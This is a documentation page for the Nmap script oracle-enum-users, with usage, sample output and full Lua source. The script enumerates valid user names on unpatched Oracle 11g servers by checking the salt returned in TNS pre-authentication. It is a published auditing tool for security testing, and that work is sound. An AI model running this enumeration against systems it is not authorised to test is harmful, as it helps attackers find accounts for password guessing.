<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File oracle-enum-users</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth<br/>
<b>Author:</b> Patrik Karlsson<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/oracle-enum-users.nse">https://svn.nmap.org/nmap/scripts/oracle-enum-users.nse</a><br/>
<h3>Summary</h3>
<p>Attempts to enumerate valid Oracle user names against unpatched Oracle 11g servers (this bug was fixed in Oracle's October 2009 Critical Patch Update).</p>
<h3>Arguments</h3>
<table>
<tr><td>oracle-enum-users.sid:</td><td>The instance against which to attempt user enumeration</td></tr>
<tr><td>passdb:</td><td>See the documentation for the <a href="nmap/libraries/unpwdb.html">unpwdb</a> library.</td></tr>
<tr><td>unpwdb.passlimit:</td><td>See the documentation for the <a href="nmap/libraries/unpwdb.html">unpwdb</a> library.</td></tr>
<tr><td>unpwdb.timelimit:</td><td>See the documentation for the <a href="nmap/libraries/unpwdb.html">unpwdb</a> library.</td></tr>
<tr><td>unpwdb.userlimit:</td><td>See the documentation for the <a href="nmap/libraries/unpwdb.html">unpwdb</a> library.</td></tr>
<tr><td>userdb:</td><td>See the documentation for the <a href="nmap/libraries/unpwdb.html">unpwdb</a> library.</td></tr>
<tr><td>tns.sid:</td><td>See the documentation for the <a href="nmap/scripts/tns.html">tns</a> library.</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 &lt;host&gt;

If no userdb is supplied the default userlist is used</pre>
<h3>Output</h3>
<pre>PORT     STATE SERVICE REASON
1521/tcp open  oracle  syn-ack
| oracle-enum-users:
|   haxxor is a valid user account
|   noob is a valid user account
|_  patrik is a valid user account</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/nmap.htm">nmap</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/table.htm">table</a></li>
<li><a href="nmap/libraries/tns.htm">tns</a></li>
<li><a href="nmap/libraries/unpwdb.htm">unpwdb</a></li>
<li><a href="nmap/libraries/rand.htm">rand</a></li>
<li><a href="nmap/libraries/openssl.htm">openssl</a></li>
</ul>
<h3>Code</h3>
<pre>local nmap = require &quot;nmap&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local table = require &quot;table&quot;
local tns = require &quot;tns&quot;
local unpwdb = require &quot;unpwdb&quot;
local rand = require &quot;rand&quot;

local openssl = stdnse.silent_require &quot;openssl&quot;

description = [[
Attempts to enumerate valid Oracle user names against unpatched Oracle 11g
servers (this bug was fixed in Oracle&#39;s October 2009 Critical Patch Update).
]]

---
-- @usage
-- nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 &lt;host&gt;
--
-- If no userdb is supplied the default userlist is used
--
-- @output
-- PORT     STATE SERVICE REASON
-- 1521/tcp open  oracle  syn-ack
-- | oracle-enum-users:
-- |   haxxor is a valid user account
-- |   noob is a valid user account
-- |_  patrik is a valid user account
--
-- @args oracle-enum-users.sid the instance against which to attempt user
--       enumeration

-- Version 0.3

-- Created 12/07/2010 - v0.1 - created by Patrik Karlsson &lt;patrik@cqure.net&gt;
-- Revised 21/07/2010 - v0.2 - revised to work with patched systems &lt;patrik&gt;
-- Revised 21/07/2010 - v0.3 - removed references to smb in get_random_string

author = &quot;Patrik Karlsson&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;intrusive&quot;, &quot;auth&quot;}


portrule = shortport.port_or_service(1521, &#39;oracle-tns&#39; )

local function checkAccount( host, port, user )

  local helper = tns.Helper:new( host, port, nmap.registry.args[&#39;oracle-enum-users.sid&#39;] )
  local status, data = helper:Connect()
  local tnscomm, auth
  local auth_options = tns.AuthOptions:new()


  if ( not(status) ) then
    return false, data
  end

  -- A bit ugly, the helper should probably provide a getSocket function
  tnscomm = tns.Comm:new( helper.tnssocket )

  status, auth = tnscomm:exchTNSPacket( tns.Packet.PreAuth:new( user, auth_options, helper.os ) )
  if ( not(status) ) then
    return false, auth
  end
  helper:Close()

  return true, auth[&quot;AUTH_VFR_DATA&quot;]
end

local function fail (err) return stdnse.format_output(false, err) end

action = function( host, port )

  local known_good_accounts = { &quot;system&quot;, &quot;sys&quot;, &quot;dbsnmp&quot;, &quot;scott&quot; }

  local status, salt
  local count = 0
  local result = {}
  local usernames

  if ( not( nmap.registry.args[&#39;oracle-enum-users.sid&#39;] ) and not( nmap.registry.args[&#39;tns.sid&#39;] ) ) then
    return fail(&quot;Oracle instance not set (see oracle-enum-users.sid or tns.sid)&quot;)
  end

  status, usernames = unpwdb.usernames()
  if( not(status) ) then
    return fail(&quot;Failed to load the usernames dictionary&quot;)
  end

  -- Check for some known good accounts
  for _, user in ipairs( known_good_accounts ) do
    status, salt = checkAccount(host, port, user)
    if( not(status) ) then return salt  end
    if ( salt ) then
      count = count + #salt
    end
  end

  -- did we atleast get a single salt back?
  if ( count &lt; 20 ) then
    return fail(&quot;None of the known accounts were detected (oracle &lt; 11g)&quot;)
  end

  -- Check for some known bad accounts
  count = 0
  for i=1, 10 do
    local user = rand.random_string(10,
      &quot;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_&quot;)
    status, salt = checkAccount(host, port, user)
    if( not(status) ) then return salt  end
    if ( salt ) then
      count = count + #salt
    end
  end

  -- It&#39;s unlikely that we hit 3 random combinations as valid users
  if ( count &gt; 60 ) then
    return fail((&quot;%d of %d random accounts were detected (Patched Oracle 11G or Oracle 11G R2)&quot;):format(count/20, 10))
  end

  for user in usernames do
    status, salt = checkAccount(host, port, user)
    if ( not(status) ) then return salt end
    if ( salt and #salt == 20 ) then
      table.insert( result, (&quot;%s is a valid user account&quot;):format(user))
    end
  end

  if ( #result == 0 ) then
    table.insert( result, &quot;Failed to find any valid user accounts&quot;)
  end

  return stdnse.format_output(true, result)
end</pre>
